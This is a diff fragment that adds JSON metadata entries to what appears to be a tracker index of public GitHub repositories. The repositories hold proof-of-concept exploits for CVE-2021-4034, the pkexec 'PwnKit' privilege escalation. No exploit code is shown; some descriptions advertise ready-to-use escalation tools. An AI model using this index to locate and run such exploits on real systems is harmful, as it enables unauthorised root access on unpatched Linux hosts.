+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 479489237,
+ "name": "CVE-2021-4034",
+ "full_name": "TotallyNotAHaxxer\/CVE-2021-4034",
+ "owner": {
+ "login": "TotallyNotAHaxxer",
+ "id": 87203697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87203697?v=4",
+ "html_url": "https:\/\/github.com\/TotallyNotAHaxxer"
+ },
+ "html_url": "https:\/\/github.com\/TotallyNotAHaxxer\/CVE-2021-4034",
+ "description": "POC for the priv esc exploit in PKEXEC [ CVE -2021-4034 ] ( needs fixing, not the best) Converted into go",
+ "fork": false,
+ "created_at": "2022-04-08T17:55:53Z",
+ "updated_at": "2022-12-06T19:29:30Z",
+ "pushed_at": "2022-04-08T17:56:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 483101688,
+ "name": "CVE-2021-4034",
+ "full_name": "rhin0cer0s\/CVE-2021-4034",
+ "owner": {
+ "login": "rhin0cer0s",
+ "id": 1358964,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1358964?v=4",
+ "html_url": "https:\/\/github.com\/rhin0cer0s"
+ },
+ "html_url": "https:\/\/github.com\/rhin0cer0s\/CVE-2021-4034",
+ "description": "A pkexec CVE-2021-4034 vulnerability exploit",
+ "fork": false,
+ "created_at": "2022-04-19T05:01:19Z",
+ "updated_at": "2022-04-19T05:01:19Z",
+ "pushed_at": "2022-04-19T05:01:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 483791193,
+ "name": "CVE-2021-4034-PoC",
+ "full_name": "0x4ndy\/CVE-2021-4034-PoC",
+ "owner": {
+ "login": "0x4ndy",
+ "id": 40269655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40269655?v=4",
+ "html_url": "https:\/\/github.com\/0x4ndy"
+ },
+ "html_url": "https:\/\/github.com\/0x4ndy\/CVE-2021-4034-PoC",
+ "description": "CVE-2021-4034 PoC",
+ "fork": false,
+ "created_at": "2022-04-20T19:44:03Z",
+ "updated_at": "2022-04-26T14:47:27Z",
+ "pushed_at": "2022-04-26T14:34:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485056122,
+ "name": "CVE-2021-4034",
+ "full_name": "antoinenguyen-09\/CVE-2021-4034",
+ "owner": {
+ "login": "antoinenguyen-09",
+ "id": 61876488,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61876488?v=4",
+ "html_url": "https:\/\/github.com\/antoinenguyen-09"
+ },
+ "html_url": "https:\/\/github.com\/antoinenguyen-09\/CVE-2021-4034",
+ "description": "My research about CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-04-24T14:52:55Z",
+ "updated_at": "2022-04-28T17:00:09Z",
+ "pushed_at": "2022-09-18T03:21:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 494691789,
+ "name": "cve-2021-4034",
+ "full_name": "wudicainiao\/cve-2021-4034",
+ "owner": {
+ "login": "wudicainiao",
+ "id": 20990570,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20990570?v=4",
+ "html_url": "https:\/\/github.com\/wudicainiao"
+ },
+ "html_url": "https:\/\/github.com\/wudicainiao\/cve-2021-4034",
+ "description": "CVE-2021-4034 for single commcand",
+ "fork": false,
+ "created_at": "2022-05-21T05:42:01Z",
+ "updated_at": "2023-02-09T01:58:09Z",
+ "pushed_at": "2022-05-31T11:56:20Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 499588777,
+ "name": "CVE-2021-4034",
+ "full_name": "TanmoyG1800\/CVE-2021-4034",
+ "owner": {
+ "login": "TanmoyG1800",
+ "id": 106038605,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106038605?v=4",
+ "html_url": "https:\/\/github.com\/TanmoyG1800"
+ },
+ "html_url": "https:\/\/github.com\/TanmoyG1800\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-03T17:03:44Z",
+ "updated_at": "2022-06-03T17:03:44Z",
+ "pushed_at": "2022-06-03T17:04:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 501393521,
+ "name": "CVE-2021-4034",
+ "full_name": "CronoX1\/CVE-2021-4034",
+ "owner": {
+ "login": "CronoX1",
+ "id": 91015518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91015518?v=4",
+ "html_url": "https:\/\/github.com\/CronoX1"
+ },
+ "html_url": "https:\/\/github.com\/CronoX1\/CVE-2021-4034",
+ "description": "Exploit modificado para el tito Eu",
+ "fork": false,
+ "created_at": "2022-06-08T20:00:39Z",
+ "updated_at": "2022-06-08T20:01:26Z",
+ "pushed_at": "2022-06-09T06:16:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 514403582,
+ "name": "cve-2021-4034",
+ "full_name": "supportingmx\/cve-2021-4034",
+ "owner": {
+ "login": "supportingmx",
+ "id": 88459207,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88459207?v=4",
+ "html_url": "https:\/\/github.com\/supportingmx"
+ },
+ "html_url": "https:\/\/github.com\/supportingmx\/cve-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-07-15T20:58:48Z",
+ "updated_at": "2024-05-03T00:28:21Z",
+ "pushed_at": "2024-05-03T00:28:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 519969135,
+ "name": "CVE-2021-4034",
+ "full_name": "A1vinSmith\/CVE-2021-4034",
+ "owner": {
+ "login": "A1vinSmith",
+ "id": 24937594,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24937594?v=4",
+ "html_url": "https:\/\/github.com\/A1vinSmith"
+ },
+ "html_url": "https:\/\/github.com\/A1vinSmith\/CVE-2021-4034",
+ "description": "Script en python sobre la vulnerabilidad CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-08-01T04:59:02Z",
+ "updated_at": "2024-04-26T08:33:31Z",
+ "pushed_at": "2022-11-02T22:24:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 522703423,
+ "name": "pwnkit",
+ "full_name": "HellGateCorp\/pwnkit",
+ "owner": {
+ "login": "HellGateCorp",
+ "id": 83019866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83019866?v=4",
+ "html_url": "https:\/\/github.com\/HellGateCorp"
+ },
+ "html_url": "https:\/\/github.com\/HellGateCorp\/pwnkit",
+ "description": "PoC for CVE-2021-4034.",
+ "fork": false,
+ "created_at": "2022-08-08T20:51:01Z",
+ "updated_at": "2023-01-04T15:15:20Z",
+ "pushed_at": "2022-08-08T18:50:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 523748195,
+ "name": "cve-2021-4034",
+ "full_name": "Silencecyber\/cve-2021-4034",
+ "owner": {
+ "login": "Silencecyber",
+ "id": 96882434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96882434?v=4",
+ "html_url": "https:\/\/github.com\/Silencecyber"
+ },
+ "html_url": "https:\/\/github.com\/Silencecyber\/cve-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-11T14:10:39Z",
+ "updated_at": "2022-08-11T14:20:30Z",
+ "pushed_at": "2022-08-11T14:20:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 524718477,
+ "name": "cve-2021-4034-poc",
+ "full_name": "Geni0r\/cve-2021-4034-poc",
+ "owner": {
+ "login": "Geni0r",
+ "id": 50078493,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50078493?v=4",
+ "html_url": "https:\/\/github.com\/Geni0r"
+ },
+ "html_url": "https:\/\/github.com\/Geni0r\/cve-2021-4034-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-14T16:07:29Z",
+ "updated_at": "2022-08-14T16:08:20Z",
+ "pushed_at": "2022-08-14T16:08:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 533483884,
+ "name": "CVE-2021-4034",
+ "full_name": "zxc2007\/CVE-2021-4034",
+ "owner": {
+ "login": "zxc2007",
+ "id": 33582901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582901?v=4",
+ "html_url": "https:\/\/github.com\/zxc2007"
+ },
+ "html_url": "https:\/\/github.com\/zxc2007\/CVE-2021-4034",
+ "description": "pwnkit auto exploiter written in Go, no network connectivity required.",
+ "fork": false,
+ "created_at": "2022-09-06T20:00:58Z",
+ "updated_at": "2023-03-09T07:28:13Z",
+ "pushed_at": "2022-09-06T17:15:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 544564312,
+ "name": "CVE-2021-4034",
+ "full_name": "Senz4wa\/CVE-2021-4034",
+ "owner": {
+ "login": "Senz4wa",
+ "id": 82728308,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82728308?v=4",
+ "html_url": "https:\/\/github.com\/Senz4wa"
+ },
+ "html_url": "https:\/\/github.com\/Senz4wa\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-02T19:42:24Z",
+ "updated_at": "2022-10-02T19:43:01Z",
+ "pushed_at": "2022-10-02T19:43:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 549250097,
+ "name": "CVE-2021-4034",
+ "full_name": "Pixailz\/CVE-2021-4034",
+ "owner": {
+ "login": "Pixailz",
+ "id": 35565530,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35565530?v=4",
+ "html_url": "https:\/\/github.com\/Pixailz"
+ },
+ "html_url": "https:\/\/github.com\/Pixailz\/CVE-2021-4034",
+ "description": "polkit priv esc: pkexec out of boundary exploit",
+ "fork": false,
+ "created_at": "2022-10-10T22:56:09Z",
+ "updated_at": "2023-05-05T16:12:11Z",
+ "pushed_at": "2022-10-11T00:40:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 554386802,
+ "name": "CVE-2021-4034",
+ "full_name": "toecesws\/CVE-2021-4034",
+ "owner": {
+ "login": "toecesws",
+ "id": 92218609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92218609?v=4",
+ "html_url": "https:\/\/github.com\/toecesws"
+ },
+ "html_url": "https:\/\/github.com\/toecesws\/CVE-2021-4034",
+ "description": "Vulnerability to CVE-2021-4034 Pwnkit",
+ "fork": false,
+ "created_at": "2022-10-19T18:19:58Z",
+ "updated_at": "2022-10-02T04:30:48Z",
+ "pushed_at": "2022-09-25T02:47:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 559639297,
+ "name": "CVE-2021-4034-pwnkit",
+ "full_name": "jehovah2002\/CVE-2021-4034-pwnkit",
+ "owner": {
+ "login": "jehovah2002",
+ "id": 25336416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25336416?v=4",
+ "html_url": "https:\/\/github.com\/jehovah2002"
+ },
+ "html_url": "https:\/\/github.com\/jehovah2002\/CVE-2021-4034-pwnkit",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-30T18:24:39Z",
+ "updated_at": "2022-11-01T07:21:49Z",
+ "pushed_at": "2022-10-30T18:24:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 571979892,
+ "name": "CVE-2021-4034",
+ "full_name": "fei9747\/CVE-2021-4034",
+ "owner": {
+ "login": "fei9747",
+ "id": 37730810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37730810?v=4",
+ "html_url": "https:\/\/github.com\/fei9747"
+ },
+ "html_url": "https:\/\/github.com\/fei9747\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-29T09:55:49Z",
+ "updated_at": "2022-11-29T09:56:08Z",
+ "pushed_at": "2022-11-29T09:56:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 585200595,
+ "name": "pwnkit",
+ "full_name": "pyhrr0\/pwnkit",
+ "owner": {
+ "login": "pyhrr0",
+ "id": 5622198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5622198?v=4",
+ "html_url": "https:\/\/github.com\/pyhrr0"
+ },
+ "html_url": "https:\/\/github.com\/pyhrr0\/pwnkit",
+ "description": "CVE-2021-4034 PoC",
+ "fork": false,
+ "created_at": "2023-01-04T15:15:31Z",
+ "updated_at": "2023-01-04T15:30:56Z",
+ "pushed_at": "2023-01-04T15:15:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 592656880,
+ "name": "CVE-2021-4034",
+ "full_name": "mutur4\/CVE-2021-4034",
+ "owner": {
+ "login": "mutur4",
+ "id": 68686790,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4",
+ "html_url": "https:\/\/github.com\/mutur4"
+ },
+ "html_url": "https:\/\/github.com\/mutur4\/CVE-2021-4034",
+ "description": "A pwnkit N-Day exploit ",
+ "fork": false,
+ "created_at": "2023-01-24T08:29:44Z",
+ "updated_at": "2024-04-16T12:52:34Z",
+ "pushed_at": "2024-04-10T14:48:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 604329826,
+ "name": "CVE-2021-4034_Python3",
+ "full_name": "c0d3cr4f73r\/CVE-2021-4034_Python3",
+ "owner": {
+ "login": "c0d3cr4f73r",
+ "id": 66146701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4",
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r"
+ },
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r\/CVE-2021-4034_Python3",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-20T20:39:32Z",
+ "updated_at": "2023-02-20T20:40:22Z",
+ "pushed_at": "2023-02-20T20:40:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 653868654,
+ "name": "CVE-2021-4034",
+ "full_name": "TheSermux\/CVE-2021-4034",
+ "owner": {
+ "login": "TheSermux",
+ "id": 70709608,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70709608?v=4",
+ "html_url": "https:\/\/github.com\/TheSermux"
+ },
+ "html_url": "https:\/\/github.com\/TheSermux\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-14T23:21:50Z",
+ "updated_at": "2023-06-14T23:24:18Z",
+ "pushed_at": "2023-06-14T23:24:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 659471096,
+ "name": "lab_cve-2021-4034-polkit-emulation-and-detection",
+ "full_name": "ps-interactive\/lab_cve-2021-4034-polkit-emulation-and-detection",
+ "owner": {
+ "login": "ps-interactive",
+ "id": 35313392,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4",
+ "html_url": "https:\/\/github.com\/ps-interactive"
+ },
+ "html_url": "https:\/\/github.com\/ps-interactive\/lab_cve-2021-4034-polkit-emulation-and-detection",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-27T23:06:02Z",
+ "updated_at": "2023-06-27T23:15:26Z",
+ "pushed_at": "2023-06-27T23:21:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 664544427,
+ "name": "CVE-2021-4034",
+ "full_name": "asepsaepdin\/CVE-2021-4034",
+ "owner": {
+ "login": "asepsaepdin",
+ "id": 122620685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4",
+ "html_url": "https:\/\/github.com\/asepsaepdin"
+ },
+ "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-10T08:05:17Z",
+ "updated_at": "2023-07-10T08:05:39Z",
+ "pushed_at": "2023-07-10T08:57:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 672008347,
+ "name": "CVE-2021-4034-Capture-the-flag",
+ "full_name": "JohnGilbert57\/CVE-2021-4034-Capture-the-flag",
+ "owner": {
+ "login": "JohnGilbert57",
+ "id": 54565130,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54565130?v=4",
+ "html_url": "https:\/\/github.com\/JohnGilbert57"
+ },
+ "html_url": "https:\/\/github.com\/JohnGilbert57\/CVE-2021-4034-Capture-the-flag",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-28T17:12:18Z",
+ "updated_at": "2023-07-28T17:20:18Z",
+ "pushed_at": "2023-07-28T17:20:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720951897,
+ "name": "Polkit-Permission-promotion-compiled",
+ "full_name": "Part01-Pai\/Polkit-Permission-promotion-compiled",
+ "owner": {
+ "login": "Part01-Pai",
+ "id": 45894602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45894602?v=4",
+ "html_url": "https:\/\/github.com\/Part01-Pai"
+ },
+ "html_url": "https:\/\/github.com\/Part01-Pai\/Polkit-Permission-promotion-compiled",
+ "description": "Polkit提权包 CVE-2021-4034 (供需要的人方便使用",
+ "fork": false,
+ "created_at": "2023-11-20T03:24:05Z",
+ "updated_at": "2024-04-20T01:15:26Z",
+ "pushed_at": "2024-04-20T01:15:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738853910,
+ "name": "CVE-2021-4034-touch",
+ "full_name": "cdxiaodong\/CVE-2021-4034-touch",
+ "owner": {
+ "login": "cdxiaodong",
+ "id": 84082748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4",
+ "html_url": "https:\/\/github.com\/cdxiaodong"
+ },
+ "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2021-4034-touch",
+ "description": "touch 生成文件",
+ "fork": false,
+ "created_at": "2024-01-04T07:43:02Z",
+ "updated_at": "2024-01-04T12:08:40Z",
+ "pushed_at": "2024-01-04T07:43:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 739869108,
+ "name": "CVE-2021-4034",
+ "full_name": "LucasPDiniz\/CVE-2021-4034",
+ "owner": {
+ "login": "LucasPDiniz",
+ "id": 57265360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4",
+ "html_url": "https:\/\/github.com\/LucasPDiniz"
+ },
+ "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-4034",
+ "description": "Local Privilege Escalation (LPE) vulnerability in Polkit - Pwnkit",
+ "fork": false,
+ "created_at": "2024-01-06T19:41:41Z",
+ "updated_at": "2024-01-06T22:14:25Z",
+ "pushed_at": "2024-01-23T04:07:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021",
+ "cve-2021-4034",
+ "escalate-privilages",
+ "pwnkit",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 743945734,
+ "name": "CVE-2021-4034",
+ "full_name": "Pol-Ruiz\/CVE-2021-4034",
+ "owner": {
+ "login": "Pol-Ruiz",
+ "id": 151052652,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4",
+ "html_url": "https:\/\/github.com\/Pol-Ruiz"
+ },
+ "html_url": "https:\/\/github.com\/Pol-Ruiz\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-16T10:18:38Z",
+ "updated_at": "2024-01-16T10:19:27Z",
+ "pushed_at": "2024-01-26T13:56:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744739584,
+ "name": "CVE-2021-4034",
+ "full_name": "cerodah\/CVE-2021-4034",
+ "owner": {
+ "login": "cerodah",
+ "id": 82907557,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82907557?v=4",
+ "html_url": "https:\/\/github.com\/cerodah"
+ },
+ "html_url": "https:\/\/github.com\/cerodah\/CVE-2021-4034",
+ "description": "PoC de Polkit",
+ "fork": false,
+ "created_at": "2024-01-17T22:55:46Z",
+ "updated_at": "2024-01-24T23:41:28Z",
+ "pushed_at": "2024-01-24T18:11:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749057888,
+ "name": "PwnKit-CVE-2021-4034",
+ "full_name": "FancySauce\/PwnKit-CVE-2021-4034",
+ "owner": {
+ "login": "FancySauce",
+ "id": 32100248,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32100248?v=4",
+ "html_url": "https:\/\/github.com\/FancySauce"
+ },
+ "html_url": "https:\/\/github.com\/FancySauce\/PwnKit-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-27T13:17:50Z",
+ "updated_at": "2024-01-27T13:29:02Z",
+ "pushed_at": "2024-03-04T21:59:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752772001,
+ "name": "CVE-2021-4034-CTF-writeup",
+ "full_name": "wechicken456\/CVE-2021-4034-CTF-writeup",
+ "owner": {
+ "login": "wechicken456",
+ "id": 55309735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55309735?v=4",
+ "html_url": "https:\/\/github.com\/wechicken456"
+ },
+ "html_url": "https:\/\/github.com\/wechicken456\/CVE-2021-4034-CTF-writeup",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-04T19:00:38Z",
+ "updated_at": "2024-05-20T18:33:17Z",
+ "pushed_at": "2024-05-20T18:33:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
